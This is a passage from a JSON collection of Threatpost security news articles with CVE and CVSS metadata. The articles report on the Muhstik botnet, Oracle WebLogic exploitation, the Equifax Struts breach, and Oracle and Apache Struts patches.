also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-11T11:47:52", "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given it\u2019s similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. There are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. \u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2019-05-06T20:04:55", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it ](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>)fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>),\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird &amp; Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the 